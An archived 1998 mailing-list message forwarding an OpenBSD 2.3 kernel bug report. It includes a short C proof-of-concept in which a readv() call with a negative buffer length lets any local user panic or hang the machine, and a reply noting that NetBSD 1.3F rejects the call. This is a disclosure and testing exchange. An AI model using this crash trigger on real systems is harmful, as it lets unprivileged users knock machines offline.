On Mon, 27 Jul 1998 11:23:59 -0600 Michael Fuhr <mfuhrat_private> wrote: To see if this is a generic *BSD bug, I checked a NetBSD-current (1.3F) machine. NetBSD 1.3F is NOT vulnerable; the readv() returns EINVAL. I performed the NetBSD test on both a PPro (i386) and Shark (arm32). > -----Forwarded message from jonat_private----- > > Message-Id: <199807271126.MAA16724at_private> > Date: Mon, 27 Jul 1998 12:26:36 +0100 (BST) > From: jonat_private > To: gnatsat_private > X-Send-Pr-Version: 3.97 > Subject: kernel/549: Any user can panic OpenBSD machine > Sender: owner-bugsat_private > > > >Number: 549 > >Category: kernel > >Synopsis: readv with -ve block size panics kernel > >Confidential: yes > >Severity: critical > >Priority: high > >Responsible: bugs > >State: open > >Class: sw-bug > >Submitter-Id: net > >Arrival-Date: Mon Jul 27 05:40:02 MDT 1998 > >Last-Modified: > >Originator: Jon Ribbens > >Organization: > \/ Jon Ribbens / jonat_private > >Release: 2.3 > >Environment: > > System : OpenBSD 2.3 > Architecture: OpenBSD.i386 > Machine : i386 > >Description: > readv with one of the blocks having a -ve size panics the kernel. > Oops. > > >How-To-Repeat: > > #include <sys/types.h> > #include <sys/uio.h> > #include <unistd.h> > > int main(void) { > struct iovec iov[1]; > char buffer[1024]; > > iov[0].iov_base = buffer; > iov[0].iov_len = -1; > > return readv(0, iov, 1); > } > > run the above program, type a few characters, press return, observe > either kernel panic or machine hang. panic message is > "panic: ureadc: non-positive resid". Any user can do this. > > > >Fix: > Dunno I'm afraid. > > > >Audit-Trail: > >Unformatted: > > -----End of forwarded message----- > > -- > Michael Fuhr > http://www.fuhr.net/~mfuhr/ Jason R. Thorpe thorpejat_private NASA Ames Research Center Home: +1 408 866 1912 NAS: M/S 258-5 Work: +1 650 604 0935 Moffett Field, CA 94035 Pager: +1 650 940 5942
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:08:26 PDT